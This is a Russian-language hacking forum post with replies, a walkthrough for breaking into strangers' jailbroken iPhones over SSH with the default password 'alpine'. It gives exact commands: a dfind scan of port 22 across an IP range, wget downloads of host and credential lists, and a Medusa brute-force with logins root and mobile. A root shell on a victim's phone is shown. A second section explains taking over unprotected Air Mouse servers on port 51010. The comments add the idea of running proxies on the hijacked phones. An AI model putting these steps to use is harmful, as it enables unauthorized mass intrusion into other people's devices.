Предыстория Недавно в IT-новостях появилась информация о уязвимости в Iphone/Ipod Touch,что при установлении из Cydia приложения OpenSSH есть уязвимость.Уязвимость в том,что стоит стандартный пароль alpine. В статье я покажу как взломать Iphone через SSH,и как можно использовать root на Iphone. Инструменты для взлома 1)Любой сканер портов,я предпочитаю dfind.(Скачать 2)Windows-Дедик с мощным каналом 3)Хостинг с SSH(для брута через SSH) Взламываем Первый шаг Ставим на Windows-дедик dfind,для удобвства создаем bat'ник со следующим содержанием: Code: dfind.exe -p 22 73.43.54.12 73.255.255.255 Запускаем сканер,ждем когда же будут результаты: В dfind сохраняет результаты в txt-файле dfind.txt Ждать надо примерно часа два-три,чтобы побольше набралось IP-адресов с открытым 22 портом. Лучше всего сканить Ip-адреса USA,т.к. компания Apple,американская фирма. Второй шаг Качаем SSH-клиент,например Putty( http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html ) Заходим на свой SSH-акк,и ставим брутфорс Medusa. Настройка Medusa Закачиваем на сервак три файла на сервак: hosts.txt,login.txt,password.txt В hosts.txt добавляем айпи насканеные нами в виде: Code: 87.123.51.79 27.123.52.113 27.123.52.140 27.123.52.184 27.123.54.33 27.123.58.139 27.123.61.139 27.123.62.62 87.123.62.155 в login.txt добавляем лишь два логина: Code: root mobile В password.txt только пароль alpine Закачиваем на сервак: Code: wget http://site.com/hosts.txt Code: wget http://site.com/password.txt Code: wget http://site.com/login.txt Дальше выполняем следующую команду: Code: medusa -T 3 -H hosts.txt -U login.txt -P password.txt -O good.txt -M ssh Ждемс результата брута! Смотрем good.txt Через несколько минут у меня уже был 1 сбрученный ssh-акк к Iphone. Подконнектился через putty и вот я удаленно подсоединился к Iphone: Code: login as: root root@*******'s password: iPhone-blackas:~ root# Защита от SSHЧерез программу BossPrefs,вырубаешь SSH А так если вам не нужен OpenSSH,то вообще не закачивается его! Authorization bypas в Air Mouse Authorization bypass Уязвимость подобия той,когда нашли в jailbreak'нутом Iphone/Ipod Touch в службе SSH! После установки сервера на Windows 7,я запустил Air Mouse.exe и я увидел следующее: Порт по дефолту:51010 Пароль по дефолту не стоит! Так мы сможем получить доступ к чужой мышке,надо иметь Iphone/Ipod Touch,сканер портов на порт 51010 Сканим и подключаемся,и будет иметь доступ к чужой мышке. Вот такая уязвимость,получили доступ к чужой мrol21ышке! (С)Xcontrol212
мда... сидия устанавливается только на взломанный айфон.. тоесть вы собственноручно его взламываете с тем же успехом можете у себя на компе установить себе коня или сборку хз какую виндовса хп, в который какойнить вася вшил свои дыры чтобы потом из вас сделать ботнет. а че вы хотите после взлома ифона чтоб он еще и норм робил?? бред в нор бла бла бла лень писать
А ломают прошивку,чтобы не платить деньги за каждую игру и программу,надо было знать... После jailbreak телефон айфон/айпод нормально робит человек это вы бред несете,google.ru почитал бы: OpenSSH система предпосылки которая позволяет вам подключить к вашему iPhone над wifi и перенести архивы от вашего компьютера к вашему iPhone Вообще то в Cydia загружается все с открытым исходным кодом,что там можно посмотреть исходный код Мда,что сказать,Ты даже не юзал айфон/айпод тач и говоришь такие вещи,иди лучше погугли информации,прежде чем писать бред....
Мне кажется или только ленивый не писал про взлом iPhone через дефолтные 2 акка? Хорошо, что статья наглядная, но очень, очень изъезжено.
вроде только на хакере писали,хотя я не находил нигде,писал сам,вот решил описать про взлом Iphone/Ipod Touch +на этих айфонах можно прокси поднять и т.д.)
